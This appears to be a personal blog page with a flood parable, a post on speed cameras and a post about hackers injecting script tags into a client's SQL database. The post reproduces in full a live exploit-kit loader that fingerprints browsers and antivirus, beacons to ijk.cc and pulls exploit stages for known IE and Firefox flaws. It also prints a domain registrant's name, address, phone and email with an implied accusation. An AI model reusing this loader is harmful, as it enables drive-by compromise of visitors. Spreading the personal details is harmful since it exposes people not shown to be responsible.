Someone said this on the comments section of Digg. I'm not a religious person by any means, but I think it's a great message.
It was flooding in California. As the flood waters were rising, a man was on the stoop of his house and another man in a row boat came by. The man in the row boat told the man on the stoop to get in and he'd save him. The man on the stoop said, no, he had faith in God and would wait for God to save him. The flood waters kept rising and the man had to go to the second floor of his house. A man in a motor boat came by and told the man in the house to get in because he had come to rescue him. The man in the house said no thank you. He had perfect faith in God and would wait for God to save him. The flood waters kept rising. Pretty soon they were up to the man's roof and he got out on the roof. A helicopter then came by, lowered a rope and the pilot shouted down to the man in the house to climb up the rope because the helicopter had come to rescue him. The man in the house wouldn't get in. He told the pilot that he had faith in God and would wait for God to rescue him. The flood waters kept rising and the man in the house drowned. When he got to heaven, he asked God where he went wrong. He told God that he had perfect faith in God, but God had let him drown.
"What more do you want from me?" asked God. "I sent you two boats and a helicopter."
Thursday, March 27, 2008
Wednesday, March 19, 2008
More Hands In Our Pockets - Point To Point Speed Cameras On Tollways
IT'S UP AND RUNNING, SO BE WARNED
New Legislation M5 & M7 Re Speeding Fines
The M5 and the M7 are now equipped with point-to-point speed devices. On entering the M7 the e-tag beeps and a camera photographs your car, recording the exact time. On exiting, the e-tag beeps again and another camera at that point photographs the car and records the time. The computer then calculates how long you took to travel between the two points and works out your speed over that distance. If you completed the clocked journey too fast, you are issued with a speeding ticket.
At present the speed limit is 100 km/h, with a tolerance up to a maximum of 102 km/h. Over that and you are issued with a fine automatically. What a shock some drivers are going to have when they use this roadway for a week and get a week's worth of tickets BOTH WAYS. Of course your license will also be recalled for 3 months. Now, with the new legislation, fighting a speed camera fine is almost impossible: you must prove the device is faulty, and unless you are a technician working on them you have no chance of beating the fine. The Pacific Highway has a set; they are recognisable by a large steel frame over the lanes carrying a speed camera, with another large metal frame and camera some distance up the road. These new point-to-point systems are being installed on any expressway or highway where vehicles cannot exit between the two points.
NOTE: School zone cameras have no tolerance. Anything over the limit, even 41, is a fine.
Tuesday, August 07, 2007
Hackers Injecting Script tags into SQL data fields
Recently, on one of my clients' sites, I noticed that some hacker scum had placed a script tag on some of the pages of the site by hacking into the SQL database and inserting the said script tag into a data field. This means that when the page is loaded, the script is also loaded.
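The defender's counterpart to the injection described above, as an added example (not the post's or the client site's own code): a Python scan that walks every column of every table for stored script tags pointing at hosts outside the site's own, and an output-encoding step that makes a stored tag render as text instead of loading. The products table, its rows and the attacker.invalid host are constructed sample data; TRUSTED_HOSTS is a hypothetical allow list.

```python
"""Find <script> tags stored in database text fields (the stored-XSS footprint of a
SQL injection) and output-encode them so they render as text, not code.
Added example; the table, rows and 'attacker.invalid' host are constructed."""
import html
import re
import sqlite3
from urllib.parse import urlparse

# <script ... src=URL> with double, single or no quotes, any case.
SCRIPT_SRC_RE = re.compile(
    r"<\s*script\b[^>]*?\bsrc\s*=\s*(?P<q>['\"]?)(?P<src>[^'\" >]+)(?P=q)",
    re.IGNORECASE,
)
SCRIPT_TAG_RE = re.compile(r"<\s*script\b", re.IGNORECASE)

# Hypothetical allow list: hosts the site legitimately loads script from.
TRUSTED_HOSTS = {"www.example-client.com"}


def script_hosts(text):
    """Every host referenced by a <script src=...> tag in text, in order of appearance.
    A relative src (no host) is reported as '(relative)'."""
    hosts = []
    for m in SCRIPT_SRC_RE.finditer(text):
        host = urlparse(m.group("src")).hostname
        hosts.append(host.lower() if host else "(relative)")
    return hosts


def scan_database(conn):
    """Walk every column of every ordinary rowid table; return one
    (table, column, rowid, host) tuple per stored <script> tag that is not trusted.
    A script tag with no src at all is reported with host '(inline)'."""
    findings = []
    cur = conn.cursor()
    tables = [r[0] for r in cur.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' ORDER BY name")]
    for table in tables:
        # PRAGMA table_info rows: (cid, name, type, notnull, dflt_value, pk)
        columns = [r[1] for r in cur.execute(f'PRAGMA table_info("{table}")')]
        for col in columns:
            rows = cur.execute(
                f'SELECT rowid, "{col}" FROM "{table}" ORDER BY rowid').fetchall()
            for rowid, value in rows:
                if not isinstance(value, str) or not SCRIPT_TAG_RE.search(value):
                    continue
                hosts = script_hosts(value)
                if not hosts:
                    findings.append((table, col, rowid, "(inline)"))
                for host in hosts:
                    if host not in TRUSTED_HOSTS:
                        findings.append((table, col, rowid, host))
    return findings


def render_safe(value):
    """Output-encode a stored value before placing it in HTML: an injected tag is
    shown as literal text, so the browser never requests its src."""
    return html.escape(value, quote=True)


def build_sample_db():
    """Constructed sample: row 2 carries an injected external script tag, row 3 an
    unquoted upper-case variant, row 4 a trusted script, row 1 is clean."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT);
        INSERT INTO products VALUES (1, 'Widget', 'A plain widget.');
        INSERT INTO products VALUES (2, 'Gadget',
            'Great gadget<script src="http://attacker.invalid/loader.js"></script>');
        INSERT INTO products VALUES (3, 'Gizmo',
            '<SCRIPT SRC=http://attacker.invalid/x.js></SCRIPT>');
        INSERT INTO products VALUES (4, 'Doohickey',
            'See <script src=''https://www.example-client.com/app.js''></script>');
    """)
    return conn


if __name__ == "__main__":
    db = build_sample_db()
    for table, col, rowid, host in scan_database(db):
        print(f"{table}.{col} rowid={rowid}: script loaded from {host}")
    print(render_safe('<script src="http://attacker.invalid/loader.js"></script>'))
```

Run against a real site the scan would be pointed at the live database driver instead of the in-memory sample; the finding list is what goes to incident response, and render_safe (or the templating engine's equivalent) is the fix that stops the stored tag from executing while the rows are cleaned.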
The location of the script that is referred to is:
http://ijk.cc
The whois information for ijk.cc is:
Registrant:
robert kuphal
102 Greer Drive
Brunswick, GA 31520
US
Email: phu59@aol.com
Registrar Name....: REGISTER.COM, INC.
Registrar Whois...: whois.register.com
Registrar Homepage: www.register.com
Domain Name: ijk.cc
Created on..............: Fri, Oct 27, 2006
Expires on..............: Sat, Oct 27, 2007
Record last updated on..: Sun, Dec 24, 2006
Administrative Contact:
Andrew McDonald
102 Greer Drive
Brunswick, GA 31520
US
Phone: +1.9418279024
Email: phu59@aol.com
Technical Contact:
Andrew McDonald
102 Greer Drive
Brunswick, GA 31520
US
Phone: +1.9418279024
Email: phu59@aol.com
DNS Servers:
ns82.websitewelcome.com
ns81.websitewelcome.com
The actual script that is at this location is as follows:
// build: Fri Dec 29 07:37:24 2006
var debug=0;
var test_mode=0;
var cookie_name="userid1";
var cookie_value="11"; // increment it after each exploits update
var server_addr="ijk.cc";
var av_num_errs = 0, av_num_ready = 0, av_finished = 0;
var user_agent = "";
var os_version = 0;
var ie_version = 0, ie_build = 0, wmp_build = 0, av_id = 0;
var system_id = "none";
function print_dbg(str)
{
    if (debug) {
        document.writeln(str + "<br>"); // line-break tag assumed; it was rendered away in the page copy
    }
}
function dbg_alert(str)
{
    if (debug) {
        alert(str);
    }
}
function GetCookie(name) {
    var dc = document.cookie;
    var prefix = name + "=";
    if (!dc) {
        print_dbg("Cookies not set!");
        return null;
    }
    var begin = dc.indexOf("; " + prefix);
    if (begin == -1) {
        begin = dc.indexOf(prefix);
        if (begin != 0) {
            print_dbg(prefix + " not found in cookie");
            return null;
        }
    } else {
        begin += 2;
    }
    var end = document.cookie.indexOf(";", begin);
    if (end == -1) {
        end = dc.length;
    }
    return unescape(dc.substring(begin + prefix.length, end));
}
function SetCookie(name, value, domain) {
    var exp = new Date();
    var two_years = exp.getTime() + (365 * 1 * 24 * 60 * 60 * 1000);
    exp.setTime(two_years);
    var curCookie = name + "=" + escape(value) + "; expires=" + exp.toGMTString();
    document.cookie = curCookie;
    print_dbg("Cookie ["+curCookie+"] set ok");
}
function GetUserAgent()
{
    if (navigator.userAgent.indexOf("Opera") == -1 &&
        navigator.userAgent.indexOf("Firefox") == -1 &&
        navigator.userAgent.indexOf("MSIE") != -1 &&
        navigator.userAgent.indexOf("Windows") != -1) {
        return "ie";
    }
    if (navigator.userAgent.indexOf("Firefox") != -1) {
        return "firefox";
    }
    if (navigator.userAgent.indexOf("Opera") != -1) {
        return "opera";
    }
    return "unknown";
}
// IE-only fingerprinting through the clientCaps behavior: exact IE and WMP builds.
function GetIEBuild()
{
    var fa, full_ver;
    var ver_num;
    oClientCaps = document.createElement("DIV");
    oClientCaps.id = "oClientCaps";
    oClientCaps.addBehavior("#default#clientCaps");
    document.body.appendChild(oClientCaps);
    full_ver = oClientCaps.getComponentVersion("{89820200-ECBD-11CF-8B85-00AA005B4383}","componentid");
    fa = full_ver.split(",");
    build_num = parseInt(fa[0]) * 10000000000 + parseInt(fa[1]) * 100000000 + parseInt(fa[2]) * 10000 + parseInt(fa[3]);
    return build_num;
}
function GetIEVersion()
{
    var fa, full_ver;
    var ver_num;
    full_ver = oClientCaps.getComponentVersion ("{89820200-ECBD-11CF-8B85-00AA005B4383}","componentid");
    fa = full_ver.split(",");
    ver_num = parseInt(fa[0]) * 100 + parseInt(fa[1]);
    return ver_num;
}
function GetWMPBuild()
{
    var fa;
    if (!oClientCaps.isComponentInstalled("{22D6F312-B0F6-11D0-94AB-0080C74C7E95}", "ComponentID")) {
        print_dbg("WMP not installed");
        return 0;
    }
    full_ver = oClientCaps.getComponentVersion ("{22D6F312-B0F6-11D0-94AB-0080C74C7E95}","componentid");
    fa = full_ver.split(",");
    build_num = parseInt(fa[0]) * 10000000000 + parseInt(fa[1]) * 100000000 + parseInt(fa[2]) * 10000 + parseInt(fa[3]);
    print_dbg(fa[0]+"."+fa[1]+"."+fa[2]+"."+ fa[3]);
    return build_num;
}
function GetFirefoxVersion()
{
    var found_ar, fa;
    var ver_str = "", ver_num = 0;
    re = /\sFirefox\/([\d\.]+)\b/;
    found_ar = re.exec(navigator.userAgent);
    if (!found_ar) {
        print_dbg("regexp failed");
        return 0;
    }
    fa = found_ar[1].split(".");
    ver_num = (parseInt(fa[0]) * 1000000) + (parseInt(fa[1]) * 10000);
    if (fa.length > 2) {
        ver_num += parseInt(fa[2]) * 100;
    }
    if (fa.length > 3) {
        ver_num += parseInt(fa[3]);
    }
    print_dbg("Firefox version: [" + ver_num + "]");
    return ver_num;
}
function GetOSVersion()
{
    var found_ar;
    var os_ver = 0;
    re = /Windows\sNT\s(\d)\.(\d)/;
    found_ar = re.exec(navigator.userAgent);
    if (!found_ar) {
        return 0;
    }
    os_ver = parseInt(found_ar[1]) * 10 + parseInt(found_ar[2]);
    //print_dbg("OS Version: [" + os_ver + "]");
    return os_ver;
}
// Payload delivery: point the hidden script element or iframe created in jl_main() at a remote URL.
function ExecScript(script_src)
{
    var st = document.getElementById('script1');
    st.src = script_src;
    return true;
}
function ExecIframe(iframe_src)
{
    var iframe = document.getElementById('iframe1');
    iframe.src = iframe_src;
    return true;
}
///// EXPS
// Each exp_* pulls a second-stage file from server_addr chosen for the fingerprinted system_id;
// only this loader is on the page, the second stages are not.
//
function exp_iscomponentinstalled()
{
    print_dbg("Loading exp_iscomponentinstalled() for SP0");
    if (test_mode) {
        dbg_alert("Exploit not loaded: test mode");
        return true;
    }
    ExecScript("http://" + server_addr + "/E/isci/isci_my.js");
}
// Firefox compareto
//
function exp_ff104()
{
    print_dbg("Loading exp_ff104()");
    if (test_mode) {
        dbg_alert("Exploit not loaded: test mode");
        return true;
    }
    ExecScript("http://" + server_addr + "/E/ff104/ff104.js");
}
// Firefox navigator java
//
function exp_ff154()
{
    print_dbg("Loading exp_ff154()");
    if (test_mode) {
        dbg_alert("Exploit not loaded: test mode");
        return true;
    }
    ExecScript("http://" + server_addr + "/E/ff154/ff154.js");
}
// Windows 2000, IE 5.x
//
function exp_ms06_044()
{
    print_dbg("Loading exp_ms06_044()");
    if (test_mode) {
        dbg_alert("Exploit not loaded: test mode");
        return true;
    }
    var my_src = 'http://'+server_addr+'/E/ms06044/ww.js';
    // var my_src = "ww.js"
    var url = 'res://mmcndmgr.dll/prevsym12.htm#%29%3B%3C/style%3E%3Cscript%20language%3D%27jscript%27%20src%3D%27'+my_src+'%27%3E3C/script%3E%3C%21--//%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0';
    document.location = url;
    // ExecIframe('http://'+server_addr+'/E/ms06044/ms06044.htm');
}
function exp_vml()
{
    print_dbg("Loading vml_exp()");
    if (test_mode) {
        dbg_alert("Exploit not loaded: test mode");
        return true;
    }
    ExecIframe('http://'+server_addr+'/E/vml/vml.htm');
}
/////////// End of EXPS /////////////////
///////////////////////////////////////////////////////
// Beacon: reports the referring hostname and the fingerprint back to server_addr
// by setting the hidden image's src, so the request shows up as a plain GET in web logs.
function NotifyServerStart()
{
    url = "http://"+server_addr+"/cgi-bin/jl/jloader.pl?source="+
        location.hostname+"&system_id="+system_id;
    if (user_agent == "ie") {
        url = url+"&iebuild="+ie_build+"&wmpbuild="+wmp_build+"&av_id="+av_id;
    }
    print_dbg("===>>> notify: user_agent=["+user_agent+"] url=["+url+"]");
    try {
        var sl = document.getElementById('serv_note_link');
        sl.src = url;
        // serv_note_link.src = url;
    } catch (e) {
        print_dbg("Cannot find element id=serv_note_link");
    };
}
// Antivirus products probed for, first by ActiveX ProgID, then by object CLSID.
progs=['NAVCfgWizDll.NAVCfgWizMgr', // 1 NAV
       'McGDMgr.DwnldGroupMgr']; // 2 McAfee
cids=['48F45200-91E6-11CE-8A4F-0080C81A28D4', // 3 trendmicro
      '091EB208-39DD-417D-A5DD-7E2C2D8FB9CB', // 4 Windows Defender
      'D653647D-D607-4DF6-A5B8-48D2BA195F7B', // 5 BitDefender Antivirus
      '9F97547E-4609-42C5-AE0C-81C61FFAEBC3', // 6 AVG7
      '65756541-C65C-11CD-0000-4B656E696100', // 7 Panda Antivirus
      '1474F601-9B4B-4EB0-81FA-20F753C0E1A4', // 8 F-Prot
      'D5507020-DB45-11d1-A5F0-00600872F78D', // 9 Norman Virus Control
      'DD230880-495A-11D1-B064-008048EC2FC5', // 10 Kaspersky
      'B089FE88-FB52-11D3-BDF1-0050DA34150D', // 11 Nod32
      '472083B0-C522-11CF-8763-00608CC02F24', // 12 Avast
      '45AC2688-0253-4ED8-97DE-B5370FA7D48A', // 13 Antivir
      '8934FCEF-F5B8-468F-951F-78A921CD3920', // 14 Ewido
      '1EB2409C-6E28-4066-9738-97A1B8F5639C', // 15 ??
      'E7593602-124B-47C9-9F73-A69308EDC973', // 16 Dr Web
      'B43CB0C0-84F2-11D6-A18E-00C0DF043BA4']; // 17 VBA32
function av_err_event(i) {
    av_num_errs++;
    cids[i] = null;
}
function av_ready_event(i) {
    var str = "ready: "+cids[i];
    av_num_ready++;
    if (av_finished) {
        return;
    }
    if (cids[i] != null) {
        var str = "av_redy_event(): Antivirus found: "+cids[i]+"!";
        av_id = progs.length + i + 1;
        av_finished = 1;
        dbg_alert("av_redy_event(): Antivirus found: "+cids[i]+"!");
        // jl_main2();
    }
}
// Return:
// 1 - antivirus found
// 0 - operation in progress
//
function StartCheckAV()
{
    var txt = "";
    try {
        var num_errs = 0;
        print_dbg("Start check progs...");
        for (i = 0; i < progs.length && !av_id; i++) {
            try {
                print_dbg("Checking "+progs[i]+"...");
                new ActiveXObject(progs[i]);
                print_dbg("Antivirus installed: " + progs[i]);
                av_id = i + 1;
                av_finished = 1;
            }
            catch (e) {};
        }
        if (av_id) {
            print_dbg("Antivirus detected av_id="+av_id+" (progs)!");
            return 1;
        }
        print_dbg("Start check antivirus CLSIDs");
        for (i = 0; i < cids.length; i++) {
            print_dbg("Creating "+cids[i]+"...");
            txt += '<'+'/object>'; // the opening tag for cids[i] was stripped when the page was rendered; only the closing tag survives
        }
        document.createElement('div').innerHTML = txt;
    } catch (e) {};
    if (av_id) {
        print_dbg("Antivirus detected av_id="+av_id+"(cids, before callbacks)!");
        return 1;
    }
    return 0;
}
// Entry point: bail out if the marker cookie is already set (one attempt per browser),
// create the hidden image/iframe/script elements, fingerprint OS, browser and AV, then
// hand the resulting system_id to jl_main2().
function jl_main()
{
    // dbg_alert("jl_main() started!");
    if (!debug) {
        try {
            if (GetCookie(cookie_name) == cookie_value) {
                print_dbg("Est kuka!");
                return false;
            }
            SetCookie(cookie_name, cookie_value);
        } catch (e) {};
    }
    // Get OS and browser versions
    //
    os_version = GetOSVersion();
    user_agent = GetUserAgent();
    // document.writeln("[Photo]");
    var tmp_img = document.createElement("IMG");
    tmp_img.id = "serv_note_link";
    tmp_img.width = 0;
    tmp_img.height = 0;
    tmp_img.border = 0;
    tmp_img.frameborder = 0;
    tmp_img.src = "about:blank";
    document.body.appendChild(tmp_img);
    var iframe1 = document.createElement("IFRAME");
    iframe1.id = "iframe1";
    iframe1.border = 0;
    iframe1.frameborder = 0;
    iframe1.width = 0;
    iframe1.height = 0;
    document.body.appendChild(iframe1);
    // document.writeln("");
    var script1 = document.createElement("SCRIPT");
    script1.id = "script1";
    document.body.appendChild(script1);
    // document.writeln("");
    print_dbg("OS Version: NT " + os_version);
    print_dbg("Browser: " + user_agent);
    // Internet Explorer
    //
    if (user_agent == "ie") {
        // Must do GetIEBuild() first!
        //
        ie_build = GetIEBuild();
        ie_version = GetIEVersion();
        wmp_build = GetWMPBuild();
        print_dbg("IE version: [" + ie_version + "]");
        print_dbg("IE build: [" + ie_build + "]");
        print_dbg("WMP build: [" + wmp_build + "]");
        // IE 7.x
        //
        if (ie_version >= 700) {
            system_id = "ie7";
        } else if (ie_version >= 600) {
            // IE 6.x
            //
            print_dbg("IE " + ie_version + " ");
            if (os_version == 50) {
                // Windows 2000
                //
                print_dbg("Win 2000 IE6");
                system_id = "ie6_2k";
            } else if (os_version == 51) {
                // Windows XP
                //
                if (ie_build >= 60029002180) {
                    print_dbg("Win XP SP2");
                    system_id = "ie6_xpsp2";
                } else if (ie_build >= 60028001106) {
                    print_dbg("Win XP SP1");
                    system_id = "ie6_xpsp1";
                } else if (ie_build == 60026000000) {
                    print_dbg("Win XP SP0");
                    system_id = "ie6_xpsp0";
                } else {
                    system_id = "ie6_xp";
                    print_dbg("Win XP SP unknown: " + ie_build);
                }
            } else {
                // TODO: Support for 98, NT, Win2003, Vista
                //
                print_dbg("Win unsupported " + os_version);
                system_id = "ie6_unknown";
            }
        } else if (ie_version < 600) {
            // IE 5.x
            //
            print_dbg("IE " + ie_version + " ");
            if (os_version == 50) {
                // MSIE 5, Windows 2000
                //
                print_dbg("Win 2000");
                system_id = "ie5_2k";
            } else if (os_version < 50) {
                print_dbg("Win NT " + os_version);
                system_id = "ie5_nt";
            }
        }
        StartCheckAV();
    }
    // Mozilla Firefox
    //
    if (user_agent == "firefox" && os_version != 0) {
        var firefox_version = 0;
        firefox_version = GetFirefoxVersion();
        // Version <= 1.0.4
        if (firefox_version <= 1000400) {
            system_id = "ff104";
        }
        // 1.0.4 < Version < 1.5.0.4
        if (firefox_version > 1000400 && firefox_version <= 1050004) {
            system_id = "ff150";
        }
    }
    jl_main2();
}
function set_window_status(stat_str)
{
    window.status = stat_str;
}
// Beacons, fakes a "loading" status bar message, then selects the second stage by system_id.
function jl_main2()
{
    av_finished = 1;
    // print_dbg("av_on="+av_on);
    NotifyServerStart();
    set_window_status("Opening "+window.location.href+"...");
    setTimeout("set_window_status('Done')", 5000);
    print_dbg("system_id: "+system_id+" av_id="+av_id+" user_agent="+user_agent);
    switch (system_id) {
    case "ie7":
    case "ie6_xp":
    case "ie6_unknown":
    case "ie6_xpsp2":
        exp_vml();
        break;
    case "ie6_xpsp1":
        exp_vml();
        break;
    case "ie6_xpsp0":
        exp_iscomponentinstalled();
        break;
    case "ie6_2k":
        exp_vml();
        break;
    case "ie5_2k":
        exp_ms06_044();
        break;
    case "ie5_nt":
        break;
    case "ff104":
        exp_ff104();
        break;
    case "ff150":
        exp_ff154();
        break;
    default:
        break;
    }
    // setTimeout('NotifyServerFinish()', 2000);
}
//jl_main();
// Run main function only after dom loaded
/* for Mozilla */
if (document.addEventListener) {
    document.addEventListener("DOMContentLoaded", jl_main, false);
} else {
    // IE
    document.write("<"+"/script>"); // the tag written here was stripped when the page was rendered; only the closing tag survives
}
I will be giving Mr Robert Kuphal of Brunswick, Georgia, USA a call to ask him why a link to a script hosted on his domain has been illegally inserted into the SQL database of the site.